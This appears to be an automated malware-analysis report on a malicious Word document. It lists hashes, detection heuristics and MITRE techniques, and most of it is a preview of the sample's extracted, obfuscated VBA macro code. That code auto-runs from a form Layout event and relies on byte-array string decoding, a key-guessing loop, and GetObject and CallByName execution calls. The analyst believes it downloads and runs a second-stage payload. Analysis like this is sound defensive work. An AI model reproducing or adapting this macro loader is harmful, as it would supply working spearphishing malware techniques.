Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a0111977c79f4eb3…

MALICIOUS

Office (OLE)

117.0 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 49a64838968e596db7b80d5cbbe025c4 SHA-1: 5973a9faa1975f80540d7954d24b5936ab2b95d2 SHA-256: a0111977c79f4eb30511f22055b54e4e973c0501240f3ba462691b1b4999d561
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the macros.bas file. The GetObject and CallByName functions are often used in conjunction with VBA macros to execute arbitrary code. The ClamAV detection further confirms its malicious nature. The VBA code appears to be obfuscated, but its structure suggests it is designed to download and execute a secondary payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41166 bytes
SHA-256: f1f35bca24c9cb1da20cbfb2149b6f964805a346f0d474d8fa48615570e8980c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim let2, let95(2) As Byte, let60(9) As Byte, let49(32) As Byte, let22(19) As Byte, let52(13) As Byte, let9(6) As Byte, let65(55) As Byte, let25(1269) As Byte, let63(5) As Byte, let10(38) As Byte, let75(38) As Byte, let62(1 To 255) As Byte
Private Sub let29()
let95(2) = let62(110)
let95(0) = let62(17)
let95(1) = let62(71)
End Sub
Private Function let99(let84)
Dim let37(1) As Byte, let05, let61, let53
If let84 > (409020 / 1604) Then
let05 = let7(let84, (-9458 + 9714))
let53 = let84 / (1694464 / 6619)
let61 = let53
Else
let05 = let84
End If
let37(0) = let05
let37(1) = let61
let99 = let37
End Function
Private Function let31(let34)
On Error GoTo let98
Dim let50, let30
Do
let30 = let34(let50)
let50 = let50 + 1
Loop
let98:
let31 = let50 - 1
End Function
Private Function let15(let94, let33, let5, let6, let3, let88)
On Error GoTo let01
Set let15 = CallByName(let94, let33, let5, let3)
let01:
End Function
Private Sub Sub1_Layout()
If let2 = 0 Then
let2 = 21
let41
End If
End Sub
Private Sub let04()
let10(15) = let62(112)
let10(26) = let62(7)
let10(34) = let62(158)
let10(36) = let62(90)
let10(5) = let62(229)
let10(16) = let62(226)
let10(27) = let62(64)
let10(20) = let62(207)
let10(28) = let62(39)
let10(8) = let62(88)
let10(32) = let62(16)
let10(7) = let62(171)
let10(17) = let62(13)
let10(37) = let62(162)
let10(4) = let62(206)
let10(38) = let62(172)
let10(35) = let62(133)
let10(12) = let62(113)
let10(1) = let62(102)
let10(2) = let62(43)
let10(30) = let62(93)
let10(11) = let62(106)
let10(25) = let62(97)
let10(9) = let62(157)
let10(0) = let62(19)
let10(6) = let62(53)
let10(24) = let62(253)
let10(19) = let62(153)
let10(21) = let62(113)
let10(29) = let62(65)
let10(10) = let62(225)
let10(14) = let62(150)
let10(31) = let62(23)
let10(23) = let62(47)
let10(13) = let62(75)
let10(3) = let62(100)
let10(18) = let62(130)
let10(33) = let62(191)
End Sub
Private Function let59(let42)
Set let59 = GetObject(let42)
End Function
Private Function let86(let08() As Byte, let69() As Byte, let90)
Dim let89, let92
On Error GoTo let91
let92 = 1
let89 = 0
While let89 <= let90
If let08(let89) <> let69(let89) Then
let92 = 0
End If
let89 = let89 + 1
Wend
let86 = let92
Exit Function
let91:
let86 = 0
End Function
Private Function let41()
Dim let39, let68, let40, let83() As Byte, let24, let06
let06 = 1
While let06 <= (-2515 + 2770)
let62(let06) = let06
let06 = let06 + 1
Wend
let02
let04
let24 = (1522432 / 5947)
let14
While let68 = 0
let83 = CStr(let39)
let40 = let31(let83())
If let40 >= 1 Then
let9(2) = let83(0) + (let83(1) * let24)
If let40 >= 3 Then
let9(3) = let83(2) + (let83(3) * let24)
If let40 >= 5 Then
let9(4) = let83(4) + (let83(5) * let24)
If let40 >= 7 Then
let9(5) = let83(6) + (let83(7) * let24)
If let40 >= 9 Then
let9(6) = let83(8) + (let83(9) * let24)
End If
End If
End If
End If
End If
If let86(let51(let10(), let77(let9()), 38), let75, 38) = 1 Then
let68 = 3356
End If
let39 = let39 + 1
Wend
If let68 = 3356 Then
let19
Else
MsgBox let68
End If
End Function
Private Sub let96()
let49(22) = let62(91)
let49(13) = let62(83)
let49(23) = let62(88)
let49(21) = let62(93)
let49(32) = let62(34)
let49(0) = let62(33)
let49(15) = let62(33)
let49(7) = let62(236)
let49(29) = let62(103)
let49(6) = let62(112)
let49(11) = let62(51)
let49(1) = let62(75)
let49(31) = let62(80)
let49(10) = let62(205)
let49(16) = let62(203)
let49(20) = let62(218)
let49(19) = let62(224)
let49(27) = let62(10)
let49(14) = let62(193)
let49(12) = let62(52)
let49(9) = let62(173)
let49(2) = let62(116)
let49(8) = let62(83)
let49(5) = let62(186)
let49(4) = let62(237)
let49(24) = let62(139)
let49(25) = let62(6)
... (truncated)